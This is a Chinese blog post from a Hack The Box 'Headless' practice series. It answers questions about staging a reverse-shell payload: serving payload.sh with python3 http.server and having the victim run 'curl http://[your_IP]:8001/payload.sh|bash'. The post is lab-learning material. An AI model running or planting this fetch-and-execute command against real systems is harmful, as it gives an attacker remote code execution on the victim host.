iT邦幫忙

2024 iThome 鐵人賽

DAY 18
0
Security

HTB_Headless系列 第 18

[問答05]HTB_Headless

  • 分享至 

  • xImage
  •  

HTB練習紀錄 — Payload

  • payload.sh 可以更換路徑嗎?
  • Payload 會在哪執行? (受害者主機? 攻擊者主機?)
  • python3建立的http server檔案來源?

回答[Day 10]


[Day 10]HTB_Headless(Reverse Shell_02)

Q1: payload.sh 可以更換路徑嗎? (當前路徑: /home/kali/payload.sh)

A: 可以

我的觀點
此問題與Q3的python3 -m http.server 8001有關聯,放到Q3一起回答

有希(給我死!)給我看到最後!!


Q2: curl http://[your_IP]:8001/payload.sh|bash 會在受害者主機還是攻擊者主機進行執行?

A: 這段程式碼會在受害者主機上執行

ChatGPT
以下是詳細解釋:

  1. curl http://[攻擊者IP]:8001/payload.sh:這個命令會從攻擊者主機的 8001 埠上下載包含惡意代碼的 payload.sh。
  2. | bash:將下載到受害者主機的 payload.sh 檔案pipe傳遞給 bash 命令進行執行。

整個命令的流程是:

  • 受害者主機使用 curl 從攻擊者主機下載 payload.sh 檔案。
  • 下載的檔案內容被管道傳遞給 bash 進行執行。

我的觀點
payload.sh從網頁上被下載,且在受害者主機中執行該payload.sh
有希(哼~)


Q3 為何python3建立的http會有/home/kali/ 路徑底下的所有檔案?

A: python3 -m http.server 8001 這條命令會在 "當前目錄" 啟動一個 HTTP 伺服器

這三題其實可以統整為 "payload.sh該如何被執行",這一共會有三個步驟

step1) 建立HTTP 伺服器

首先需要有一個攻擊者的伺服器,用來讓被攻擊者瀏覽,並且存放payload。
須注意以下三點:

  1. 建立HTTP 伺服器後,可以透過隨意IP進入,但port必須與第二點相同
    (須注意在HTB中的靶機,必須透過tun0的inet IP才能成功連線)
  2. python3 -m http.server 8001 的8001改成任意port(除去有固定用途的443,80...等)都能成功連線。
  3. 進入到HTTP 伺服器後,呈現的資料夾與執行python3指令的資料夾是同一個
    https://ithelp.ithome.com.tw/upload/images/20240819/20168534VenMONZvej.png

step2) 建立Payload.sh

Payload.sh必須建立在 step1) 建立伺服器的檔案路徑底下
https://ithelp.ithome.com.tw/upload/images/20240819/20168534rqBLTcZu1h.png

step3) 注入和執行 Reverse Shell

這串指令碼如同下圖,先下載payload.sh到受害者主機,最後在受害者主機中執行payload

curl http://[your_IP]:8001/payload.sh|bash

https://ithelp.ithome.com.tw/upload/images/20240819/20168534f094m8ECNB.png


上一篇
[Day 13]HTB_Headless(END)
下一篇
[問答06]HTB_Headless
系列文
HTB_Headless30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言